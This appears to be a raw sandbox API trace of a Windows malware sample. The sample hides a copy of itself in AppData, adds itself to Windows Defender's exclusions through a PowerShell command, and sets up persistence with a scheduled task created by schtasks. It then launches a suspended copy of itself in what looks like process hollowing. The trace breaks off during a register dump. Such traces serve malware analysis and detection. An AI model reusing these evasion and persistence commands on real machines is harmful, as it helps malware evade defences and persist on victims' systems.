[0163.310] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\gatzisok.exe"), bFailIfExists=1) returned 1
[0164.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e418, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
[0164.577] GetUserNameW (in: lpBuffer=0x19e6f8, pcbBuffer=0x19e970 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19e970) returned 1
[0164.596] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", dwFileAttributes=0x2007) returned 1
[0164.611] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.613] CoTaskMemAlloc (cb=0x8) returned 0x716e50
[0164.614] CoTaskMemAlloc (cb=0x1a) returned 0x737c98
[0164.617] LsaLookupNames2 (in: PolicyHandle=0x6ff0c0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.620] CoTaskMemFree (pv=0x737c98)
[0164.620] CoTaskMemFree (pv=0x716e50)
[0164.629] LsaClose (ObjectHandle=0x6ff0c0) returned 0x0
[0164.630] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.630] LsaFreeMemory (Buffer=0x7268d0) returned 0x0
[0164.630] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.630] CoTaskMemAlloc (cb=0x8) returned 0x716f00
[0164.630] CoTaskMemAlloc (cb=0x1a) returned 0x737b58
[0164.630] LsaLookupNames2 (in: PolicyHandle=0x6ff320, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.631] CoTaskMemFree (pv=0x737b58)
[0164.631] CoTaskMemFree (pv=0x716f00)
[0164.631] LsaClose (ObjectHandle=0x6ff320) returned 0x0
[0164.631] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.632] LsaFreeMemory (Buffer=0x726d48) returned 0x0
[0164.635] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.635] CoTaskMemAlloc (cb=0x8) returned 0x716dc0
[0164.635] CoTaskMemAlloc (cb=0x1a) returned 0x737c70
[0164.636] LsaLookupNames2 (in: PolicyHandle=0x6ff320, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.636] CoTaskMemFree (pv=0x737c70)
[0164.636] CoTaskMemFree (pv=0x716dc0)
[0164.637] LsaClose (ObjectHandle=0x6ff320) returned 0x0
[0164.637] LsaFreeMemory (Buffer=0x6fa488) returned 0x0
[0164.637] LsaFreeMemory (Buffer=0x7265b8) returned 0x0
[0164.637] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.639] CoTaskMemAlloc (cb=0x8) returned 0x716f50
[0164.639] CoTaskMemAlloc (cb=0x1a) returned 0x737b30
[0164.639] LsaLookupNames2 (in: PolicyHandle=0x6ff1a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.640] CoTaskMemFree (pv=0x737b30)
[0164.640] CoTaskMemFree (pv=0x716f50)
[0164.640] LsaClose (ObjectHandle=0x6ff1a0) returned 0x0
[0164.640] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.640] LsaFreeMemory (Buffer=0x7262f8) returned 0x0
[0164.640] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.641] CoTaskMemAlloc (cb=0x8) returned 0x716ef0
[0164.641] CoTaskMemAlloc (cb=0x1a) returned 0x737b08
[0164.641] LsaLookupNames2 (in: PolicyHandle=0x6ff0a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.641] CoTaskMemFree (pv=0x737b08)
[0164.641] CoTaskMemFree (pv=0x716ef0)
[0164.642] LsaClose (ObjectHandle=0x6ff0a0) returned 0x0
[0164.642] LsaFreeMemory (Buffer=0x6fa488) returned 0x0
[0164.642] LsaFreeMemory (Buffer=0x726be8) returned 0x0
[0164.642] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.642] CoTaskMemAlloc (cb=0x8) returned 0x716ef0
[0164.642] CoTaskMemAlloc (cb=0x1a) returned 0x737ef0
[0164.642] LsaLookupNames2 (in: PolicyHandle=0x6ff0a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.643] CoTaskMemFree (pv=0x737ef0)
[0164.643] CoTaskMemFree (pv=0x716ef0)
[0164.643] LsaClose (ObjectHandle=0x6ff0a0) returned 0x0
[0164.643] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.644] LsaFreeMemory (Buffer=0x726770) returned 0x0
[0164.644] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.644] CoTaskMemAlloc (cb=0x8) returned 0x716e50
[0164.644] CoTaskMemAlloc (cb=0x1a) returned 0x737d88
[0164.644] LsaLookupNames2 (in: PolicyHandle=0x6ff260, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.645] CoTaskMemFree (pv=0x737d88)
[0164.645] CoTaskMemFree (pv=0x716e50)
[0164.645] LsaClose (ObjectHandle=0x6ff260) returned 0x0
[0164.645] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.645] LsaFreeMemory (Buffer=0x726a30) returned 0x0
[0164.645] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.646] CoTaskMemAlloc (cb=0x8) returned 0x716de0
[0164.646] CoTaskMemAlloc (cb=0x1a) returned 0x737d88
[0164.646] LsaLookupNames2 (in: PolicyHandle=0x6ff0a0, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.646] CoTaskMemFree (pv=0x737d88)
[0164.646] CoTaskMemFree (pv=0x716de0)
[0164.647] LsaClose (ObjectHandle=0x6ff0a0) returned 0x0
[0164.647] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.647] LsaFreeMemory (Buffer=0x7266c0) returned 0x0
[0164.647] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e780, DesiredAccess=0x800, PolicyHandle=0x19e740 | out: PolicyHandle=0x19e740) returned 0x0
[0164.647] CoTaskMemAlloc (cb=0x8) returned 0x716e10
[0164.647] CoTaskMemAlloc (cb=0x1a) returned 0x737dd8
[0164.647] LsaLookupNames2 (in: PolicyHandle=0x6ff200, Flags=0x0, Count=0x1, Names="RDhJ0CNFevzX", ReferencedDomains=0x19e754, Sids=0x19e748 | out: ReferencedDomains=0x19e754, Sids=0x19e748) returned 0x0
[0164.648] CoTaskMemFree (pv=0x737dd8)
[0164.648] CoTaskMemFree (pv=0x716e10)
[0164.648] LsaClose (ObjectHandle=0x6ff200) returned 0x0
[0164.648] LsaFreeMemory (Buffer=0x6fa3b8) returned 0x0
[0164.648] LsaFreeMemory (Buffer=0x726610) returned 0x0
[0164.649] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", nBufferLength=0x105, lpBuffer=0x19e418, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe", lpFilePart=0x0) returned 0x32
[0164.649] SetNamedSecurityInfoW () returned 0x0
[0164.723] GetCurrentProcess () returned 0xffffffff
[0164.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e860 | out: TokenHandle=0x19e860*=0x3c4) returned 1
[0164.802] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19e858 | out: TokenInformation=0x0, ReturnLength=0x19e858) returned 0
[0164.802] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x716e60
[0164.802] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x8, TokenInformation=0x716e60, TokenInformationLength=0x4, ReturnLength=0x19e858 | out: TokenInformation=0x716e60, ReturnLength=0x19e858) returned 1
[0164.803] LocalFree (hMem=0x716e60) returned 0x0
[0164.803] DuplicateTokenEx (in: hExistingToken=0x3c4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19e860 | out: phNewToken=0x19e860*=0x3c8) returned 1
[0164.804] CheckTokenMembership (in: TokenHandle=0x3c8, SidToCheck=0x23ccccc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19e870 | out: IsMember=0x19e870) returned 1
[0164.804] CloseHandle (hObject=0x3c8) returned 1
[0165.145] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x6ff200
[0165.145] LocalAlloc (uFlags=0x0, uBytes=0xaa) returned 0x6fb2e0
[0165.150] ShellExecuteExW (in: pExecInfo=0x23d62a8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x23d62a8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x508)) returned 1
[0168.528] LocalFree (hMem=0x6ff200) returned 0x0
[0168.529] LocalFree (hMem=0x6fb2e0) returned 0x0
[0168.532] GetCurrentProcess () returned 0xffffffff
[0168.532] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e8f0 | out: TokenHandle=0x19e8f0*=0x3c8) returned 1
[0168.536] GetCurrentProcess () returned 0xffffffff
[0168.536] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e8c0 | out: TokenHandle=0x19e8c0*=0x3d0) returned 1
[0168.537] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19e8f4 | out: TokenInformation=0x0, ReturnLength=0x19e8f4) returned 0
[0168.537] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0xa211630
[0168.537] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0xa211630, TokenInformationLength=0x24, ReturnLength=0x19e8f4 | out: TokenInformation=0xa211630, ReturnLength=0x19e8f4) returned 1
[0168.538] LocalFree (hMem=0xa211630) returned 0x0
[0168.539] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19e810, DesiredAccess=0x800, PolicyHandle=0x19e7d0 | out: PolicyHandle=0x19e7d0) returned 0x0
[0168.539] LsaLookupSids (in: PolicyHandle=0xa20a5d0, Count=0x1, Sids=0x23d6598*=0x23d653c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), ReferencedDomains=0x19e7ec, Names=0x19e7e0 | out: ReferencedDomains=0x19e7ec, Names=0x19e7e0) returned 0x0
[0168.541] LsaClose (ObjectHandle=0xa20a5d0) returned 0x0
[0168.542] LsaFreeMemory (Buffer=0xa1f9278) returned 0x0
[0168.542] LsaFreeMemory (Buffer=0xa20e150) returned 0x0
[0168.543] CoTaskMemAlloc (cb=0x20c) returned 0xa20aed8
[0168.543] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0xa20aed8 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25
[0168.543] CoTaskMemFree (pv=0xa20aed8)
[0168.543] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19e3ec, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16
[0168.544] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19e400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0168.544] CoTaskMemAlloc (cb=0x20c) returned 0xa20aed8
[0168.544] GetTempFileNameW (in: lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0xa20aed8 | out: lpTempFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpda5d.tmp")) returned 0xda5d
[0168.546] CoTaskMemFree (pv=0xa20aed8)
[0168.603] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", nBufferLength=0x105, lpBuffer=0x19e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", lpFilePart=0x0) returned 0x34
[0168.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e7e8) returned 1
[0168.603] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpda5d.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4
[0168.604] GetFileType (hFile=0x3d4) returned 0x1
[0168.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e7e4) returned 1
[0168.604] GetFileType (hFile=0x3d4) returned 0x1
[0168.605] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dab60*, nNumberOfBytesToWrite=0x63c, lpNumberOfBytesWritten=0x19e874, lpOverlapped=0x0 | out: lpBuffer=0x23dab60*, lpNumberOfBytesWritten=0x19e874*=0x63c, lpOverlapped=0x0) returned 1
[0168.606] CloseHandle (hObject=0x3d4) returned 1
[0168.619] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x737c98
[0168.619] LocalAlloc (uFlags=0x0, uBytes=0xb6) returned 0xa1fe6e0
[0168.619] ShellExecuteExW (in: pExecInfo=0x23dc404*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\gATZIsOK\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x23dc404*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\gATZIsOK\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4f4)) returned 1
[0172.379] LocalFree (hMem=0x737c98) returned 0x0
[0172.380] LocalFree (hMem=0xa1fe6e0) returned 0x0
[0172.435] GetCurrentProcess () returned 0xffffffff
[0172.435] GetCurrentProcess () returned 0xffffffff
[0172.435] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19e8d8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19e8d8*=0x48c) returned 1
[0172.437] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19e8d0*=0x48c, lpdwindex=0x19e6ec | out: lpdwindex=0x19e6ec) returned 0x0
[0187.591] CloseHandle (hObject=0x48c) returned 1
[0187.592] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", lpFilePart=0x0) returned 0x34
[0187.593] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpda5d.tmp")) returned 1
[0188.051] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName=0x0) returned 0x48c
[0188.052] memcpy (in: _Dst=0xa350000, _Src=0x3e045a0, _Size=0x20000 | out: _Dst=0xa350000) returned 0xa350000
[0188.053] CloseHandle (hObject=0x48c) returned 1
[0188.162] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", lpFilePart=0x0) returned 0x62
[0188.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19de0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0188.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", cchWideChar=98, lpMultiByteStr=0x19e5d4, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe\x94\x04wèÒ'(ú", lpUsedDefaultChar=0x0) returned 98
[0188.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x19e5d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x94\x1e\x94\x04C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", lpUsedDefaultChar=0x0) returned 0
[0188.329] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19e694*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19e9b0 | out: lpCommandLine="", lpProcessInformation=0x19e9b0*(hProcess=0x428, hThread=0x48c, dwProcessId=0x1248, dwThreadId=0x127c)) returned 1
[0188.416] CoTaskMemFree (pv=0x0)
[0188.428] GetThreadContext (in: hThread=0x48c, lpContext=0x242d404 | out: lpContext=0x242d404*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x35d000, Edx=0x0, Ecx=0x0, Eax=0x4ac276, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, 